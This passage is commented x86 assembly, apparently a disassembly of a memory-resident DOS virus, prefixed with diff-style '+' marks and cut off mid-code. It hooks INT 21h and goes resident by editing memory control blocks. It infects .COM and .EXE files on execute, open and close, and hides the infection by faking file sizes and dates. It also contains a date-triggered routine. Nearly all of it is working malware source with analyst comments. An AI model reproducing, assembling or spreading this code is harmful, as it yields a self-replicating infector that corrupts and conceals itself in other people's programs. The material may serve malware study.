(CS:0021=0FEh) + push word ptr data_31 ; (CS:0020=0FE00h) + int 21h 
; DOS Services ah=function 4Bh + ; run progm @ds:dx, parm @es:bx + pop word ptr data_31 ; (CS:0020=0FE00h) + add word ptr es:[di-4],9 + nop + mov es,old_DS ; (CS:1245) + mov ds,old_DS ; (CS:1245) + sub word ptr ds:[2],161h ; decrement mem size + mov bp,word ptr ds:[2] ; mem size + mov dx,ds + sub bp,dx + mov ah,4Ah + mov bx,0FFFFh + int 21h ; DOS Services ah=function 4Ah + ; change mem allocation, bx=siz + mov ah,4Ah + int 21h ; DOS Services ah=function 4Ah + ; change mem allocation, bx=siz + dec dx + mov ds,dx + cmp byte ptr ds:[MCB_0000],5Ah ; (7DBC:0000=0E9h) 'Z' + je loc_4 ; Jump if equal + dec cs:data_95 ; (CS:12E2=0) +loc_4: + cmp byte ptr cs:data_95,0 ; (CS:12E2=0) + je loc_5 ; Jump if equal + mov byte ptr ds:[MCB_0000],4Dh ; (7DBC:0000=0E9h) 'M' +loc_5: + mov ax,ds:MCB_0003 ; (7DBC:0003=1503h) + mov bx,ax + sub ax,161h + add dx,ax + mov ds:MCB_0003,ax ; (7DBC:0003=1503h) + inc dx + mov es,dx + mov byte ptr es:MCB_0000,5Ah ; (915F:0000=0) 'Z' + push cs:data_69 ; (CS:1249=0) + pop word ptr es:MCB_0001 ; (915F:0001=0) + mov word ptr es:MCB_0003,160h ; (915F:0003=0) + inc dx + mov es,dx + push cs + pop ds + mov cx,all_len/2 + mov si,all_len-2 ; (CS:15FE=0) + mov di,si + std ; Set direction flag + rep movsw ; Rep when cx >0 Mov [si] to es:[di] + cld ; Clear direction + push es + mov ax,offset loc_1EE + push ax + mov es,cs:old_DS ; (CS:1245=7DBDh) + mov ah,4Ah ; 'J' + mov bx,bp + int 21h ; DOS Services ah=function 4Ah + ; change mem allocation, bx=siz + retf ; Return far - jump to loc_1EE +loc_1EE: call sub_18 ; (0DBA) + mov cs:data_72,cs ; (CS:124E=7DBDh) + call sub_18 ; (0DBA) + push cs + pop ds + mov byte ptr data_76,14h ; (CS:12A2=0) + push cs + pop es + mov di,offset data_75 ; (CS:1252=0) + mov cx,14h + xor ax,ax ; Zero register + rep stosw ; Rep when cx >0 Store ax to es:[di] + mov data_103,al ; (CS:12EF=0) + mov ax,old_DS ; (CS:1245=7DBDh) + mov es,ax + lds dx,es:[0Ah] ; from offset 000A in PSP Load 32 bit ptr + mov ds,ax + add ax,10h + add word ptr 
cs:data_29+2,ax ; (CS:001A=1ED5h) + cmp byte ptr cs:data_31,0 ; (CS:0020=0) + jne loc_6 ; Jump if not equal +; restore infected .COM file and run it + sti ; Enable interrupts + mov ax,cs:data_23 ; (CS:0004=20CDh) + mov word ptr ds:[100h],ax ; (CS:0100=0E9Ah) + mov ax,cs:data_24 ; (CS:0006=340h) + mov word ptr ds:[102h],ax ; (CS:0102=589Ch) + mov ax,cs:data_25 ; (CS:0008=50C6h) + mov word ptr ds:[104h],ax ; (CS:0104=0Dh) + push cs:old_DS ; (CS:1245=7DBDh) + mov ax,100h + push ax + mov ax,cs:old_AX ; (CS:12E3=0) + retf ; Return far +loc_6: +; restore infected .EXE file and run it + add cs:data_27,ax ; (CS:0012=68Ch) + mov ax,cs:old_AX ; (CS:12E3=0) + mov ss,cs:data_27 ; (CS:0012=68Ch) + mov sp,cs:data_28 ; (CS:0014) original SP + sti ; Enable interrupts + jmp cs:data_29 ; (CS:0018=12Bh) +virus_entry: cmp sp,100h + ja loc_7 ; Jump if above + xor sp,sp ; Zero register +loc_7: + mov bp,ax + call sub_2 ; (0275) +sub_2: pop cx + sub cx,offset sub_2 + mov ax,cs + mov bx,10h + mul bx ; dx:ax = ax * 10 + add ax,cx ; cx = virus begin address + adc dx,0 + div bx ; ax,dx rem=dx:ax/10 + push ax ; ax = new segment + mov ax,offset vir_1 + push ax + mov ax,bp + retf ; Return far - jump to vir_1 + +table db 30h + dw offset _21_30 + db 23h + dw offset _21_23 + db 37h + dw offset _21_37 + db 4bh + dw offset _21_4B + db 3ch + dw offset _21_3C + db 3dh + dw offset _21_3D + db 3Eh + dw offset _21_3E + db 0Fh + dw offset _21_0F + db 14h + dw offset _21_14 + db 21h + dw offset _21_21 + db 27h + dw offset _21_27 + db 11h + dw offset _21_11_12 + db 12h + dw offset _21_11_12 + db 4Eh + dw offset _21_4E_4F + db 4Fh + dw offset _21_4E_4F + db 3Fh + dw offset _21_3F + db 40h + dw offset _21_40 + db 42h + dw offset _21_42 + db 57h + dw offset _21_57 + db 48h + dw offset _21_48 +end_tbl: +INT_21: cmp ax,4b00h + jnz loc_8_1 + mov cs:data_95,al +loc_8_1: push bp + mov bp,sp + push [bp+6] ; flags + pop cs:data_85 + pop bp ; ??? + push bp ; ??? 
+ mov bp,sp + call sub_21 ; Save REGS in vir's stack + call sub_18 ; xchg info in INT 21 + call sub_15 ; BREAK = OFF + call sub_20 ; Restore regs from vir's stack + call sub_17 ; Save REGS + push bx + mov bx,offset table +loc_8: + cmp ah,cs:[bx] + jne loc_9 ; Jump if not equal + mov bx,cs:[bx+1] + xchg bx,[bp-14h] + cld ; Clear direction + retn +loc_9: + add bx,3 + cmp bx,offset end_tbl + jb loc_8 ; Jump if below + pop bx +loc_10: + call sub_16 ; Restore BREAK state + in al,21h ; port 21h, 8259-1 int IMR + mov cs:data_97,al ; (CS:12E5=0) + mov al,0FFh + out 21h,al ; port 21h, 8259-1 int comands + mov byte ptr cs:data_74,4 ; (CS:1251=0) + mov byte ptr cs:data_73,1 ; (CS:1250=0) + call sub_22 ; Set INT 01 for debuging + call sub_19 ; Restore REGS + push ax + mov ax,cs:data_85 ; (CS:12B3=0) + or ax,100h + push ax + popf ; Pop flags + pop ax + pop bp + jmp dword ptr cs:ptr_INT_21 ; (CS:1235=0) +loc_11: + call sub_21 ; Save REGS in vir's stack + call sub_16 ; (0D9B) + call sub_18 ; (0DBA) + call sub_20 ; Restore regs from vir's stack + pop bp + push bp + mov bp,sp + push cs:data_85 ; (CS:12B3=0) + pop word ptr [bp+6] + pop bp + iret ; Interrupt return +_21_11_12: call sub_19 ; Restore REGS + call sub_24 ; INT 21 + or al,al ; Zero ? + jnz loc_11 ; Jump if not zero + call sub_17 ; Save REGS + call sub_3 ; (0581) + mov al,0 + cmp byte ptr [bx],0FFh + jne loc_12 ; Jump if not equal + mov al,[bx+6] + add bx,7 +loc_12: + and cs:data_104,al ; (CS:12F0=0) + test byte ptr [bx+1Ah],80h + jz loc_13 ; Jump if zero + sub byte ptr [bx+1Ah],0C8h + cmp byte ptr cs:data_104,0 ; (CS:12F0=0) + jne loc_13 ; Jump if not equal + sub word ptr [bx+1Dh],1000h + sbb word ptr [bx+1Fh],0 +loc_13: + call sub_19 ; Restore REGS + jmp short loc_11 ; (033F) +_21_0F: call sub_19 ; Restore REGS + call sub_24 ; INT 21 + call sub_17 ; Save REGS + or al,al ; Zero ? 
+ jnz loc_13 ; Jump if not zero + mov bx,dx + test byte ptr [bx+15h],80h + jz loc_13 ; Jump if zero + sub byte ptr [bx+15h],0C8h + sub word ptr [bx+10h],1000h + sbb byte ptr [bx+12h],0 + jmp short loc_13 ; (0396) +_21_27: jcxz loc_15 ; Jump if cx=0 +_21_21: mov bx,dx + mov si,[bx+21h] + or si,[bx+23h] + jnz loc_15 ; Jump if not zero + jmp short loc_14 ; (03D7) +_21_14: mov bx,dx + mov ax,[bx+0Ch] + or al,[bx+20h] + jnz loc_15 ; Jump if not zero +loc_14: + call sub_7 ; (0919) + jnc loc_16 ; Jump if carry=0 +loc_15: + jmp loc_10 ; (030F) +loc_16: + call sub_19 ; Restore REGS + call sub_17 ; Save REGS + call sub_24 ; INT 21 + mov [bp-4],ax + mov [bp-8],cx + push ds + push dx + call sub_3 ; (0581) + cmp word ptr [bx+14h],1 + je loc_17 ; Jump if equal + mov ax,[bx] + add ax,[bx+2] + add ax,[bx+4] + jz loc_17 ; Jump if zero + add sp,4 + jmp short loc_13 ; (0396) +loc_17: + pop dx + pop ds + mov si,dx + push cs + pop es + mov di,offset data_86 ; (CS:12B5=0) + mov cx,25h + rep movsb ; Rep when cx >0 Mov [si] to es:[di] + mov di,offset data_86 ; (CS:12B5=0) + push cs + pop ds + mov ax,[di+10h] + mov dx,[di+12h] + add ax,100Fh + adc dx,0 + and ax,0FFF0h + mov [di+10h],ax + mov [di+12h],dx + sub ax,0FFCh + sbb dx,0 + mov [di+21h],ax + mov [di+23h],dx + mov word ptr [di+0Eh],1 + mov cx,1Ch + mov dx,di + mov ah,27h ; ''' + call sub_24 ; INT 21 + jmp loc_13 ; (0396) +_21_23: push cs + pop es + mov si,dx + mov di,offset data_86 ; (CS:12B5=0) + mov cx,25h + rep movsb ; Rep when cx >0 Mov [si] to es:[di] + push ds + push dx + push cs + pop ds + mov dx,offset data_86 ; CS:12B5 + mov ah,0Fh + call sub_24 ; INT 21 + mov ah,10h + call sub_24 ; INT 21 + test byte ptr data_89,80h ; (CS:12CA=0) + pop si + pop ds + jz loc_20 ; Jump if zero + les bx,cs:data_88 ; (CS:12C5=0) Load 32 bit ptr + mov ax,es + sub bx,1000h + sbb ax,0 + xor dx,dx ; Zero register + mov cx,cs:data_87 ; (CS:12C3=0) + dec cx + add bx,cx + adc ax,0 + inc cx + div cx ; ax,dx rem=dx:ax/reg + mov [si+23h],ax + xchg ax,dx + 
xchg ax,bx + div cx ; ax,dx rem=dx:ax/reg + mov [si+21h],ax + jmp loc_13 ; (0396) +_21_4E_4F: and cs:data_85,0FFFEh ; (CS:12B3=0) + call sub_19 ; Restore REGS + call sub_24 ; INT 21 + call sub_17 ; Save REGS + jnc loc_18 ; Jump if carry=0 + or cs:data_85,1 ; (CS:12B3=0) + jmp loc_13 ; (0396) +loc_18: + call sub_3 ; (0581) + test byte ptr [bx+19h],80h + jnz loc_19 ; Jump if not zero + jmp loc_13 ; (0396) +loc_19: + sub word ptr [bx+1Ah],1000h + sbb word ptr [bx+1Ch],0 + sub byte ptr [bx+19h],0C8h + jmp loc_13 ; (0396) +_21_3C: push cx + and cx,7 + cmp cx,7 + je loc_23 ; Jump if equal + pop cx + call sub_13 ; (0CC6) + call sub_24 ; INT 21 + call sub_14 ; (0D6C) + pushf ; Push flags + cmp byte ptr cs:data_90,0 ; (CS:12DA=0) + je loc_21 ; Jump if equal + popf ; Pop flags +loc_20: + jmp loc_10 ; (030F) +loc_21: + popf ; Pop flags + jc loc_22 ; Jump if carry Set + mov bx,ax + mov ah,3Eh ; '>' + call sub_24 ; INT 21 + jmp short _21_3D ; (0511) +loc_22: + or byte ptr cs:data_85,1 ; (CS:12B3=0) + mov [bp-4],ax + jmp loc_13 ; (0396) +loc_23: + pop cx + jmp loc_10 ; (030F) +_21_3D: + call sub_9 ; Get PSP segment + call sub_8 ; (0925) + jc loc_26 ; Jump if carry Set + cmp byte ptr cs:data_76,0 ; (CS:12A2=0) + je loc_26 ; Jump if equal + call sub_10 ; (097E) + cmp bx,0FFFFh + je loc_26 ; Jump if equal + dec cs:data_76 ; (CS:12A2=0) + push cs + pop es + mov di,offset data_75 ; (CS:1252=0) + mov cx,14h + xor ax,ax ; Zero register + repne scasw ; Rep zf=0+cx >0 Scan es:[di] for ax + mov ax,cs:data_77 ; (CS:12A3=0) + mov es:[di-2],ax + mov es:[di+26h],bx + mov [bp-4],bx +loc_25: + and byte ptr cs:data_85,0FEh ; (CS:12B3=0) + jmp loc_13 ; (0396) +loc_26: + jmp loc_10 ; (030F) +_21_3E: push cs + pop es + call sub_9 ; Get PSP segment + mov di,offset data_75 ; (CS:1252=0) + mov cx,14h + mov ax,cs:data_77 ; (CS:12A3=0) +loc_27: + repne scasw ; Rep zf=0+cx >0 Scan es:[di] for ax + jnz loc_28 ; Jump if not zero + cmp bx,es:[di+26h] + jne loc_27 ; Jump if not equal + mov word ptr 
es:[di-2],0 + call sub_4 ; (0793) - infect file + inc cs:data_76 ; (CS:12A2=0) + jmp short loc_25 ; (0549) +loc_28: + jmp loc_10 ; (030F) + +; +; SUBROUTINE +; + +sub_3 proc near + push es + mov ah,2Fh ; '/' + call sub_24 ; INT 21 + push es + pop ds + pop es + retn +sub_3 endp + +_21_4B: or al,al ; Zero ? + jz loc_29 ; Jump if zero + jmp loc_36 ; (06E0) +loc_29: + push ds + push dx + mov cs:prm_blck_adr,bx ; (CS:1224) save EXEC block offset + mov word ptr cs:prm_blck_adr+2,es ; (CS:1226) save EXEC block segment + lds si,dword ptr cs:prm_blck_adr ; (CS:1224) Load EXEC block address + mov di,offset exec_block ; (CS:12F1) + mov cx,0Eh + push cs + pop es + rep movsb ; Save EXEC param block + pop si + pop ds + mov di,offset file_name ; (CS:1307) + mov cx,50h + rep movsb ; Save file name + mov bx,0FFFFh + call sub_23 ; (0E3A) + call sub_19 ; Restore REGS + pop bp + pop cs:data_98 ; (CS:12E6=0) + pop cs:data_99 ; (CS:12E8=0) + pop cs:data_85 ; (CS:12B3=0) + mov ax,4B01h + push cs + pop es + mov bx,offset exec_block + pushf ; Push flags + call dword ptr cs:ptr_INT_21 ; (CS:1235=0) + jnc loc_30 ; Jump if carry=0 + or cs:data_85,1 ; (CS:12B3=0) + push cs:data_85 ; (CS:12B3=0) + push cs:data_99 ; (CS:12E8=0) + push cs:data_98 ; (CS:12E6=0) + push bp + mov bp,sp + les bx,dword ptr cs:prm_blck_adr ; (CS:1224=0) Load 32 bit ptr + jmp loc_11 ; (033F) +loc_30: + call sub_9 ; Get PSP segment + push cs + pop es + mov di,offset data_75 ; (CS:1252=0) + mov cx,14h +loc_31: + mov ax,cs:data_77 ; (CS:12A3=0) + repne scasw ; Rep zf=0+cx >0 Scan es:[di] for ax + jnz loc_32 ; Jump if not zero + mov word ptr es:[di-2],0 + inc cs:data_76 ; (CS:12A2=0) + jmp short loc_31 ; (060B) +loc_32: + lds si,cs:entry_point ; (CS:1303=0) Load 32 bit ptr + cmp si,1 ; already infected? 
+ jne loc_33 ; Jump if not equal + mov dx,word ptr ds:data_29+2 ; (0000:001A) - original entry point segment + add dx,10h + mov ah,51h + call sub_24 ; INT 21 - get PSP segment + add dx,bx + mov word ptr cs:entry_point+2,dx ; (CS:1305=0) + push word ptr ds:data_29 ; (0000:0018) - original entry point offset + pop word ptr cs:entry_point ; (CS:1303=0) + add bx,10h + add bx,ds:data_27 ; (0000:0012) - original SS: + mov cs:data_107,bx ; (CS:1301=0) + push word ptr ds:data_28 ; (0000:0014) - original SP + pop cs:data_106 ; (CS:12FF=0) + jmp short loc_34 ; (067F) +loc_33: + mov ax,[si] + add ax,[si+2] + add ax,[si+4] + jz loc_35 ; Jump if zero + push cs + pop ds + mov dx,offset file_name + call sub_8 ; (0925) + call sub_10 ; (097E) + inc cs:data_103 ; (CS:12EF=0) + call sub_4 ; infect file + dec cs:data_103 ; (CS:12EF=0) +loc_34: + mov ah,51h + call sub_24 ; INT 21 + call sub_21 ; Save REGS in vir's stack + call sub_16 ; (0D9B) + call sub_18 ; (0DBA) + call sub_20 ; Restore REGS from vir's stack + mov ds,bx + mov es,bx + push cs:data_85 ; (CS:12B3=0) + push cs:data_99 ; (CS:12E8=0) + push cs:data_98 ; (CS:12E6=0) + pop word ptr ds:PSP_0A ; offset 0A in PSP + pop word ptr ds:PSP_0A+2 ; offset 0C in PSP + push ds + lds dx,dword ptr ds:PSP_0A ; offset 0A in PSP - terminate address + mov al,22h + call sub_27 ; Set INT 22 vector + pop ds + popf ; Pop flags + pop ax + mov ss,cs:data_107 ; (CS:1301=0) + mov sp,cs:data_106 ; (CS:12FF=0) + jmp dword ptr cs:entry_point ; (CS:1303=0) +loc_35: + mov bx,[si+1] + mov ax,ds:[bx+si+sav_file] ; (0000:FD9F) + mov [si],ax + mov ax,ds:[bx+si+sav_file+2] ; (0000:FDA1) + mov [si+2],ax + mov ax,ds:[bx+si+sav_file+4] ; (0000:FDA3) + mov [si+4],ax + jmp short loc_34 ; (067F) +loc_36: + cmp al,1 + je loc_37 ; Jump if equal + jmp loc_10 ; (030F) +loc_37: + or cs:data_85,1 ; (CS:12B3=0) + mov cs:prm_blck_adr,bx ; (CS:1224=0) + mov word ptr cs:prm_blck_adr+2,es ; (CS:1226=7DBDh) + call sub_19 ; Restore REGS + call sub_24 ; INT 21 + call sub_17 ; 
Save REGS + les bx,dword ptr cs:prm_blck_adr ; (CS:1224) Load EXEC param block address + lds si,dword ptr es:[bx+12h] ; Load CS:IP from EXEC parameter block + jc loc_40 ; Jump if carry Set + and byte ptr cs:data_85,0FEh ; (CS:12B3=0) + cmp si,1 ; infected .EXE ? + je loc_38 ; Jump if equal + mov ax,[si] + add ax,[si+2] + add ax,[si+4] + jnz loc_39 ; Jump if not zero + mov bx,[si+1] + mov ax,ds:[bx+si+sav_file] ; (013B:FD9F) saved original file + mov [si],ax + mov ax,ds:[bx+si+sav_file+2] ; (013B:FDA1) saved original file + mov [si+2],ax + mov ax,ds:[bx+si+sav_file+4] ; (013B:FDA3) saved original file + mov [si+4],ax + jmp short loc_39 ; (0765) +loc_38: + mov dx,word ptr ds:data_29+2 ; (013B:001A=2E09h) + call sub_9 ; Get PSP segment + mov cx,cs:data_77 ; (CS:12A3) - PSP segment + add cx,10h + add dx,cx + mov es:[bx+14h],dx + mov ax,word ptr ds:data_29 ; (013B:0018=7332h) + mov es:[bx+12h],ax + mov ax,ds:data_27 ; (013B:0012=2E08h) + add ax,cx + mov es:[bx+10h],ax + mov ax,ds:data_28 ; (013B:0014=3E80h) + mov es:[bx+0Eh],ax +loc_39: + call sub_9 ; Get PSP segment + mov ds,cs:data_77 ; (CS:12A3=0) + mov ax,[bp+2] + mov ds:PSP_0A,ax ; (0000:000A=0F000h) + mov ax,[bp+4] + mov word ptr ds:PSP_0A+2,ax ; (0000:000C=7F6h) +loc_40: + jmp loc_13 ; (0396) +_21_30: mov byte ptr cs:data_104,0 ; (CS:12F0=0) + mov ah,2Ah + call sub_24 ; INT 21 + cmp dx,916h + jb loc_41 ; Jump if below + call sub_28 ; (0FB2) +loc_41: + jmp loc_10 ; (030F) + +; +; SUBROUTINE - INFECTION +; + +sub_4 proc near + call sub_13 ; (0CC6) + call sub_5 ; (0855) + mov byte ptr data_31,1 ; (CS:0020=0) + cmp data_38,5A4Dh ; (CS:1200=0) + je loc_42 ; Jump if equal + cmp data_38,4D5Ah ; (CS:1200=0) + je loc_42 ; Jump if equal + dec byte ptr data_31 ; (CS:0020=0) + jz loc_45 ; Jump if zero +loc_42: +; .EXE file infect + mov ax,data_41 ; (CS:1204=0) + shl cx,1 ; Shift w/zeros fill + mul cx ; dx:ax = reg * ax + add ax,200h + cmp ax,si + jb loc_44 ; Jump if below + mov ax,data_43 ; (CS:120A=0) + or ax,data_44 ; 
(CS:120C=0) + jz loc_44 ; Jump if zero + mov ax,data_80 ; (CS:12A9=0) + mov dx,data_81 ; (CS:12AB=0) + mov cx,200h + div cx ; ax,dx rem=dx:ax/reg + or dx,dx ; Zero ? + jz loc_43 ; Jump if zero + inc ax +loc_43: + mov data_41,ax ; (CS:1204=0) + mov data_40,dx ; (CS:1202=0) + cmp data_48,1 ; (CS:1214=0) + je loc_46 ; Jump if equal + mov data_48,1 ; (CS:1214=0) + mov ax,si + sub ax,data_42 ; (CS:1208=0) + mov data_49,ax ; (CS:1216=0) + add data_41,8 ; (CS:1204=0) + mov data_45,ax ; (CS:120E=0) + mov data_46,1000h ; (CS:1210=0) BUG BUG BUG!!! + ; When .EXE file is infected, + ; the end of the virus wil be + ; damaged. (sp = 1000) + call sub_6 ; (08B3) +loc_44: + jmp short loc_46 ; (084C) +loc_45: +; .COM file infect + cmp si,0F00h ; file len in paragraphs + jae loc_46 ; Jump if above or = + mov ax,data_38 ; (CS:1200=0) + mov data_23,ax ; (CS:0004=20CDh) + add dx,ax + mov ax,data_40 ; (CS:1202=0) + mov data_24,ax ; (CS:0006=340h) + add dx,ax + mov ax,data_41 ; (CS:1204=0) + mov data_25,ax ; (CS:0008=50C6h) + add dx,ax + jz loc_46 ; Jump if zero - allready infected + mov cl,0E9h + mov byte ptr data_38,cl ; (CS:1200=0) + mov ax,10h + mul si ; dx:ax = reg * ax + add ax,265h + mov word ptr data_38+1,ax ; (CS:1201=0) + mov ax,data_38 ; (CS:1200=0) + add ax,data_40 ; (CS:1202=0) + neg ax + mov data_41,ax ; (CS:1204=0) + call sub_6 ; (08B3) +loc_46: + mov ah,3Eh ; '>' + call sub_24 ; INT 21 + call sub_14 ; (0D6C) + retn +sub_4 endp + + +; +; SUBROUTINE +; + +sub_5 proc near + push cs + pop ds + mov ax,5700h + call sub_24 ; INT 21 + mov data_53,cx ; (CS:1229=0) + mov data_54,dx ; (CS:122B=0) + mov ax,4200h + xor cx,cx ; Zero register + mov dx,cx + call sub_24 ; INT 21 + mov ah,3Fh ; '?' + mov cl,1Ch + mov dx,1200h + call sub_24 ; INT 21 + mov ax,4200h + xor cx,cx ; Zero register + mov dx,cx + call sub_24 ; INT 21 + mov ah,3Fh ; '?' 
+ mov cl,1Ch + mov dx,4 + call sub_24 ; INT 21 + mov ax,4202h + xor cx,cx ; Zero register + mov dx,cx + call sub_24 ; INT 21 + mov data_80,ax ; (CS:12A9=0) + mov data_81,dx ; (CS:12AB=0) + mov di,ax + add ax,0Fh + adc dx,0 + and ax,0FFF0h + sub di,ax + mov cx,10h + div cx ; ax,dx rem=dx:ax/reg + mov si,ax + retn +sub_5 endp + + +; +; SUBROUTINE +; + +sub_6 proc near + mov ax,4200h + xor cx,cx ; Zero register + mov dx,cx + call sub_24 ; INT 21 + mov ah,40h + mov cl,1Ch + mov dx,1200h + call sub_24 ; INT 21 + mov ax,10h + mul si ; dx:ax = reg * ax + mov cx,dx + mov dx,ax + mov ax,4200h + call sub_24 ; INT 21 + xor dx,dx ; Zero register + mov cx,1000h + add cx,di + mov ah,40h + call sub_24 ; INT 21 + mov ax,5701h + mov cx,data_53 ; (CS:1229=0) + mov dx,data_54 ; (CS:122B=0) + test dh,80h + jnz loc_47 ; Jump if not zero + add dh,0C8h +loc_47: call sub_24 ; INT 21 + cmp byte ptr dos_ver,3 ; (CS:12EE=0) + jb loc_ret_48 ; Jump if below + cmp byte ptr data_103,0 ; (CS:12EF=0) + je loc_ret_48 ; Jump if equal + push bx + mov dl,data_52 ; (CS:1228=0) + mov ah,32h + call sub_24 ; INT 21 + mov ax,cs:data_101 ; (CS:12EC=0) + mov [bx+1Eh],ax + pop bx +loc_ret_48: + retn +sub_6 endp + + +; +; SUBROUTINE +; + +sub_7 proc near + call sub_21 ; Save REGS in vir's stack + mov di,dx + add di,0Dh + push ds + pop es + jmp short loc_50 ; (0945) +sub_7 endp + + +; +; SUBROUTINE +; + +sub_8 proc near + call sub_21 ; Save REGS in vir's stack - save REGS + push ds + pop es + mov di,dx + mov cx,50h + xor ax,ax ; Zero register + mov bl,0 + cmp byte ptr [di+1],3Ah ; ':' + jne loc_49 ; Jump if not equal + mov bl,[di] + and bl,1Fh +loc_49: + mov cs:data_52,bl ; (CS:1228=0) + repne scasb ; Rep zf=0+cx >0 Scan es:[di] for al +loc_50: + mov ax,[di-3] + and ax,0DFDFh + add ah,al + mov al,[di-4] + and al,0DFh + add al,ah + mov byte ptr cs:data_31,0 ; (CS:0020=0) + cmp al,0DFh ; file name is ....COM + je loc_51 ; Jump if equal + inc byte ptr cs:data_31 ; (CS:0020=0) + cmp al,0E2h ; file name is ....EXE + 
jne loc_52 ; Jump if not equal +loc_51: + call sub_20 ; Restore regs from vir's stack + clc ; Clear carry flag + retn +loc_52: + call sub_20 ; Restore regs from vir's stack + stc ; Set carry flag + retn +sub_8 endp + + +; +; SUBROUTINE +; + +sub_9 proc near + push bx + mov ah,51h + call sub_24 ; INT 21 + mov cs:data_77,bx ; (CS:12A3=0) + pop bx + retn +sub_9 endp + + +; +; SUBROUTINE +; + +sub_10 proc near + call sub_13 ; (0CC6) + push dx + mov dl,cs:data_52 ; (CS:1228=0) + mov ah,36h ; '6' + call sub_24 ; INT 21 + mul cx ; dx:ax = reg * ax + mul bx ; dx:ax = reg * ax + mov bx,dx + pop dx + or bx,bx ; Zero ? + jnz loc_53 ; Jump if not zero + cmp ax,4000h + jb loc_54 ; Jump if below +loc_53: + mov ax,4300h + call sub_24 ; INT 21 + jc loc_54 ; Jump if carry Set + mov di,cx + xor cx,cx ; Zero register + mov ax,4301h + call sub_24 ; INT 21 + cmp byte ptr cs:data_90,0 ; (CS:12DA=0) + jne loc_54 ; Jump if not equal + mov ax,3D02h + call sub_24 ; INT 21 + jc loc_54 ; Jump if carry Set + mov bx,ax + mov cx,di + mov ax,4301h + call sub_24 ; INT 21 + push bx + mov dl,cs:data_52 ; (CS:1228=0) + mov ah,32h ; '2' + call sub_24 ; INT 21 + mov ax,[bx+1Eh] + mov cs:data_101,ax ; (CS:12EC=0) + pop bx + call sub_14 ; (0D6C) + retn +loc_54: + xor bx,bx ; Zero register + dec bx + call sub_14 ; (0D6C) + retn +sub_10 endp + + +; +; SUBROUTINE +; + +sub_11 proc near + push cx + push dx + push ax + mov ax,4400h + call sub_24 ; INT 21 + xor dl,80h + test dl,80h + jz loc_55 ; Jump if zero + mov ax,5700h + call sub_24 ; INT 21 + test dh,80h +loc_55: + pop ax + pop dx + pop cx + retn +sub_11 endp + + +; +; SUBROUTINE +; + +sub_12 proc near + call sub_21 ; Save REGS in vir's stack + mov ax,4201h + xor cx,cx ; Zero register + xor dx,dx ; Zero register + call sub_24 ; INT 21 + mov cs:data_78,ax ; (CS:12A5=0) + mov cs:data_79,dx ; (CS:12A7=0) + mov ax,4202h + xor cx,cx ; Zero register + xor dx,dx ; Zero register + call sub_24 ; INT 21 + mov cs:data_80,ax ; (CS:12A9=0) + mov cs:data_81,dx ; 
(CS:12AB=0) + mov ax,4200h + mov dx,cs:data_78 ; (CS:12A5=0) + mov cx,cs:data_79 ; (CS:12A7=0) + call sub_24 ; INT 21 + call sub_20 ; Restore regs from vir's stack + retn +sub_12 endp + +_21_57: or al,al ; Zero ? + jnz loc_58 ; Jump if not zero + and cs:data_85,0FFFEh ; (CS:12B3=0) + call sub_19 ; Restore REGS + call sub_24 ; INT 21 + jc loc_57 ; Jump if carry Set + test dh,80h + jz loc_56 ; Jump if zero + sub dh,0C8h +loc_56: + jmp loc_11 ; (033F) +loc_57: + or cs:data_85,1 ; (CS:12B3=0) + jmp loc_11 ; (033F) +loc_58: + cmp al,1 + jne loc_61 ; Jump if not equal + and cs:data_85,0FFFEh ; (CS:12B3=0) + test dh,80h + jz loc_59 ; Jump if zero + sub dh,0C8h +loc_59: + call sub_11 ; (09E6) + jz loc_60 ; Jump if zero + add dh,0C8h +loc_60: + call sub_24 ; INT 21 + mov [bp-4],ax + adc cs:data_85,0 ; (CS:12B3=0) + jmp loc_13 ; (0396) +_21_42: cmp al,2 + jne loc_61 ; Jump if not equal + call sub_11 ; (09E6) + jz loc_61 ; Jump if zero + sub word ptr [bp-0Ah],1000h + sbb word ptr [bp-8],0 +loc_61: + jmp loc_10 ; (030F) +_21_3F: and byte ptr cs:data_85,0FEh ; (CS:12B3=0) + call sub_11 ; (09E6) + jz loc_61 ; Jump if zero + mov cs:data_83,cx ; (CS:12AF=0) + mov cs:data_82,dx ; (CS:12AD=0) + mov cs:data_84,0 ; (CS:12B1=0) + call sub_12 ; (0A04) + mov ax,cs:data_80 ; (CS:12A9=0) + mov dx,cs:data_81 ; (CS:12AB=0) + sub ax,1000h + sbb dx,0 + sub ax,cs:data_78 ; (CS:12A5=0) + sbb dx,cs:data_79 ; (CS:12A7=0) + jns loc_62 ; Jump if not sign + mov word ptr [bp-4],0 + jmp loc_25 ; (0549) +loc_62: + jnz loc_63 ; Jump if not zero + cmp ax,cx + ja loc_63 ; Jump if above + mov cs:data_83,ax ; (CS:12AF=0) +loc_63: + mov dx,cs:data_78 ; (CS:12A5=0) + mov cx,cs:data_79 ; (CS:12A7=0) + or cx,cx ; Zero ? + jnz loc_64 ; Jump if not zero + cmp dx,1Ch + jbe loc_65 ; Jump if below or = +loc_64: + mov dx,cs:data_82 ; (CS:12AD=0) + mov cx,cs:data_83 ; (CS:12AF=0) + mov ah,3Fh ; '?' 
+ call sub_24 ; INT 21 + add ax,cs:data_84 ; (CS:12B1=0) + mov [bp-4],ax + jmp loc_13 ; (0396) +loc_65: + mov si,dx + mov di,dx + add di,cs:data_83 ; (CS:12AF=0) + cmp di,1Ch + jb loc_66 ; Jump if below + xor di,di ; Zero register + jmp short loc_67 ; (0B35) +loc_66: + sub di,1Ch + neg di +loc_67: + mov ax,dx + mov cx,cs:data_81 ; (CS:12AB=0) + mov dx,cs:data_80 ; (CS:12A9=0) + add dx,0Fh + adc cx,0 + and dx,0FFF0h + sub dx,0FFCh + sbb cx,0 + add dx,ax + adc cx,0 + mov ax,4200h + call sub_24 ; INT 21 + mov cx,1Ch + sub cx,di + sub cx,si + mov ah,3Fh ; '?' + mov dx,cs:data_82 ; (CS:12AD=0) + call sub_24 ; INT 21 + add cs:data_82,ax ; (CS:12AD=0) + sub cs:data_83,ax ; (CS:12AF=0) + add cs:data_84,ax ; (CS:12B1=0) + xor cx,cx ; Zero register + mov dx,1Ch + mov ax,4200h + call sub_24 ; INT 21 + jmp loc_64 ; (0B04) +_21_40: and byte ptr cs:data_85,0FEh ; (CS:12B3=0) + call sub_11 ; (09E6) + jnz loc_68 ; Jump if not zero + jmp loc_61 ; (0AA2) +loc_68: + mov cs:data_83,cx ; (CS:12AF=0) + mov cs:data_82,dx ; (CS:12AD=0) + mov cs:data_84,0 ; (CS:12B1=0) + call sub_12 ; (0A04) + mov ax,cs:data_80 ; (CS:12A9=0) + mov dx,cs:data_81 ; (CS:12AB=0) + sub ax,1000h + sbb dx,0 